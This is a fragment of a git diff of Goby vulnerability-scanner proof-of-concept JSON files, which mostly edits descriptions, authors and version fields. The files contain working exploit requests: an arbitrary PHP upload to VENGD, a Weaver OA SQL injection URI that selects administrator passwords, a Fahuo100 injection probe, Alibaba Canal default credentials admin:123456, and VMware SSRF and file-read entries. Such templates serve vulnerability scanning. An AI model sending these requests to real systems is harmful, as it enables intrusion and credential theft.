"SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "2022-06-25 20:10:24", - "GobyVersion": "1.9.323" + "PostTime": "2021-11-29 15:03:58", + "GobyVersion": "1.9.310" } \ No newline at end of file diff --git a/poc/VENGD_Arbitrary_File_Upload.json b/poc/VENGD_Arbitrary_File_Upload.json index 285d630..73c26a4 100644 --- a/poc/VENGD_Arbitrary_File_Upload.json +++ b/poc/VENGD_Arbitrary_File_Upload.json @@ -5,11 +5,11 @@ "getshell" ], "GobyQuery": "title=\"和信下一代云桌面VENGD\"", - "Description": "和信创天云桌面系统存在任意文件上传", + "Description": "VENGD", "Product": "VENGD", "Homepage": "https://www.vesystem.com/products/3", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "VENGD Arbitrary File Upload", "Recommendation": "", "References": [ "https://blog.csdn.net/weixin_44146996/article/details/115611026" @@ -37,7 +37,7 @@ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" }, "data_type": "text", - "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n\n------WebKitFormBoundaryfcKRltGv--", + "data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n\r\n------WebKitFormBoundaryfcKRltGv--", "set_variable": [ "str1|rand|str|7", "r1|rand|int|8" @@ -106,7 +106,7 @@ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" }, "data_type": "text", - "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--", + "data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n{{{FileContent}}}\r\n------WebKitFormBoundaryfcKRltGv--", "set_variable": [ "r1|rand|int|8" ] @@ -156,6 +156,6 @@ ] } ], - "PostTime": "2021-12-09 13:55:04", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json b/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json index ac72523..6ae21fe 100644 --- a/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json +++ b/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json @@ -4,16 +4,23 @@ "Tags": [ "SSRF" ], - "GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"", - "Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.", + "GobyQuery": "app=\"Apache-Web-Server\" && title=\"vRealize Operations Manager\"", + "Description": "vRealize Operations Enable self-driving IT Operations Management across private, hybrid and multi-cloud environments with a unified operations platform that delivers continuous performance, capacity and cost optimization, intelligent remediation and integrated compliance through AI/ML and predictive analytics.", "Product": "VMWare Operations vRealize Operations", - "Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html", - "Author": "PeiQi", - "Impact": " can perform server-side request forgery attack to steal management credentials.
undefined
", + "Homepage": "https://www.vmware.com/products/vrealize-operations.html", + "Author": "", + "Impact": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", + "Recommendation": "", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2021-21975", + "https://www.vmware.com/security/advisories/VMSA-2021-0004.html" ], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -64,7 +71,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -111,11 +118,9 @@ } ] }, - "SetVariable": [ - "output|lastbody" - ] + "SetVariable": [] } ], - "PostTime": "2021-04-07 23:45:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json b/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json index 670e4b2..d106efe 100644 --- a/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json +++ b/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json @@ -8,7 +8,7 @@ "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", "Product": "VMware-vCenter", "Homepage": "https://www.vmware.com/products/vcenter-server.html", - "Author": "aetkrad", + "Author": "", "Impact": "", "Recommendation": "", "References": [ @@ -100,6 +100,6 @@ ] } ], - "PostTime": "2021-12-02 18:50:55", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Weaver_OA_8_SQL_injection.json b/poc/Weaver_OA_8_SQL_injection.json index b523bde..e59fe29 100644 --- a/poc/Weaver_OA_8_SQL_injection.json +++ b/poc/Weaver_OA_8_SQL_injection.json @@ -5,15 +5,19 @@ "SQL Injection" ], "GobyQuery": "app=\"Weaver-OA\"", - "Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges", + "Description": "", "Product": "Weaver OA 8", - "Homepage": "https://www.weaver.com.cn/", - "Author": "PeiQi", - "Impact": "", - "Recommandation": "undefined
", - "References": [ - "http://wiki.peiqi.tech" - ], + "Homepage": "https://weaver.com/", + "Author": "", + "Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.", + "Recommendation": "", + "References": [], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -47,7 +51,7 @@ "type": "item", "variable": "$body", "operation": "not contains", - "value": "", + "value": "<html>", "bz": "" }, { @@ -62,6 +66,6 @@ "SetVariable": [] } ], - "PostTime": "2021-04-10 08:00:20", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/YAPI_RCE.json b/poc/YAPI_RCE.json index b796f28..f72040a 100644 --- a/poc/YAPI_RCE.json +++ b/poc/YAPI_RCE.json @@ -4,17 +4,20 @@ "Tags": [ "rce" ], - "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", - "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。", + "GobyQuery": "app=\"YAPI\" || title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" || title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\"", + "Description": "YApi is an efficient, easy-to-use and powerful visual interface management platform.", "Product": "YAPI", "Homepage": "https://github.com/YMFE/yapi", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.", "Recommendation": "", "References": [ + "https://www.secpulse.com/archives/162502.html", + "https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b", + "https://twitter.com/sec715/status/1415484190561161216", "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,6 +67,43 @@ ] } ], - "PostTime": "2021-12-01 20:34:40", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/alibaba_canal_default_password.json b/poc/alibaba_canal_default_password.json index bd3b0b6..ee40781 100644 --- a/poc/alibaba_canal_default_password.json +++ b/poc/alibaba_canal_default_password.json @@ -1,18 +1,20 @@ { - "Name": "alibaba canal default password", - "Level": "3", + "Name": "Alibaba Canal Default Password", + "Level": "2", "Tags": [ "defaultaccount" ], - "GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")", - "Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456", - "Product": "Remote attacker can use this default to control the system", + "GobyQuery": "title=\"Canal Admin\" || body=\"Canal Admin Login\"", + "Description": "Alibaba Canal is Incremental log parsing based on MySQL database, providing incremental data subscription and consumption.", + "Product": "Alibaba Canal", "Homepage": "https://github.com/alibaba/canal", - "Author": "aetkrad", - "Impact": "", - "Recommendation": "", - "References": [], - "HasExp": false, + "Author": "", + "Impact": "Alibaba Canal has a default password vulnerability, an attacker can use the administrator account admin:123456 login.", + "Recommendation": "Modify Alibaba Canal administrator's default password.", + "References": [ + "https://github.com/alibaba/canal/wiki/ClientAdapter" + ], + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -128,6 +130,6 @@ ] } ], - "PostTime": "2021-10-31 17:23:05", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/fahuo100_sql_injection_CNVD_2021_30193.json b/poc/fahuo100_sql_injection_CNVD_2021_30193.json index cd9bc54..a5b837e 100644 --- a/poc/fahuo100_sql_injection_CNVD_2021_30193.json +++ b/poc/fahuo100_sql_injection_CNVD_2021_30193.json @@ -1,19 +1,25 @@ { - "Name": "fahuo100_sql_injection_CNVD_2021_30193", - "Level": "3", + "Name": "Fahuo100 SQL Injection CNVD-2021-30193", + "Level": "2", "Tags": [ "SQL Injection" ], "GobyQuery": "header=\"Cache-Control: no-store, no-cache\"", - "Description": "发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息", - "Product": "发货100", + "Description": "Fahuo100 virtual goods automatic delivery system is a powerful virtual goods automatic delivery system/article paid reading system.", + "Product": "Fahuo100", "Homepage": "https://www.fahuo100.cn/", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommandation": "undefined
", + "Author": "", + "Impact": "Fahuo100 M_id SQL Injection", + "Recommendation": "", "References": [ - "https://gobies.org/" + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-30193" ], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +27,7 @@ "method": "GET", "uri": "/?M_id=1'&type=product", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -48,6 +54,6 @@ "SetVariable": [] } ], - "PostTime": "2021-06-03 22:27:28", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file